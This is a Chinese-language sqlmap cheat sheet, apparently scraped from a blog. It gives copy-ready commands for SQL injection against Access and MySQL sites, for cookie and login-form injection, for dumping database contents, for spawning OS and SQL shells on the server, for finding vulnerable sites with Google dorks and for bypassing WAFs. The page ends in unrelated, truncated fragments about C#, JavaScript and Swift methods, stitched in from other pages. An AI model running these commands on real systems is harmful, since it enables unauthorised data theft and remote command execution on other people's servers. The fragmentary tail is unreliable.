–cookie : 設定我們的cookie值
-u : 指定目標url
-b : 獲取dbms banner
–-current-db : 獲取當前資料庫
–-current-user:獲取當前使用者
–batch 引數採用預設選項,不進行詢問
–privilege:檢視許可權
–force-ssl:採用https
–level:1-5越高越深度探測
–dbms: mssql 、mysql |等指定資料庫型別
———————————————————————————————
access注入:
sqlmap -u 「注入點」
sqlmap -u 「注入點」 –tables //猜解表
sqlmap -u 「注入點」 -t *** –columns //猜解字段
sqlmap -u 「注入點」 -t *** -c ***,*** –dump //猜解內容
———————————————————————————————
mysql注入:
sqlmap -u 「注入點」 –dbs //獲取資料庫
sqlmap -u 「注入點」 -d *** –tables //獲取資料庫
sqlmap -u 「注入點」 -d *** -t *** –columns //猜解字段
sqlmap -u 「注入點」 -d *** -t *** -c ***,*** –dump //猜解內容
———————————————————————————————
cookies注入:
sqlmap -u 「注入點」 –cookie –level 2
———————————————————————————————
post登入框注入:
一、bp抓包把報存成txt
python sqlmap.py -r post.txt -p j_password
二、自動搜尋表單
sqlmap -u 「注入點」 –forms //自動搜尋表單
sqlmap -u 「注入點」 –data 「username=1&password=1」 //指定引數
———————————————————————————————
互動寫shell及命令執行:
sqlmap -u 「注入點」 –os-shell //啟動shell,在**根目錄生成tmpbxbxz.php tmpuoiuz.php檔案
sqlmap -u 「注入點」 –os-cmd=whoami //命令執行
sqlmap -u 「注入點」 –sql-shell //sqlshell
———————————————————————————————
偽靜態注入:
sqlmap -u –dbs //網頁加*
———————————————————————————————
請求延時:
sqlmap -u 「注入點」 –delay 1 //2次請求間隔1秒
sqlmap -u 「注入點」 –safe-freq 1 //3
———————————————————————————————
注入搜尋:
sqlmap -g inurl:php?id= //google搜尋注入點
———————————————————————————————
繞過waf:
sqlmap -u 「注入點」 –tamper 「過waf指令碼」
一些常用公共方法
根據檔案字尾名獲取檔案的mime型別 檔案字尾名,如 jpg,gif 返回該檔案的mime型別,如 image gif return sresult 根據資料表的列名取的列的序號 列名 資料表 列號,沒有找到返回 1 public static int gettablecolindexbyname ...
一些常用js方法
使用命名空間 var global global.namespace function str else 陣列相關 判斷元素是否存在 第一種寫法 為系統陣列物件新增原型擴充套件方法 array.prototype.inarray function value return false 第二種 自定義...
Swift String 一些常用方法
直接上 字串 1 判斷字串是否為空 var test1str var test1str2 string string println test1str test1str.isempty 沒有值 有值 println test1str2 test1str2.isempty 沒有值 有值 2 計算字串的...